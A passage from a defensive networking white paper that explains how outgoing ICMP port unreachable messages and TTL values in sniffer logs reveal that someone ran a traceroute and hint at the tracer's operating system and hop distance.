3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message.

You can also find our more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observer the TTL values, then we can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:

The Operating System running on the attacker’s target system.

Number of hops away, the attacker is from you.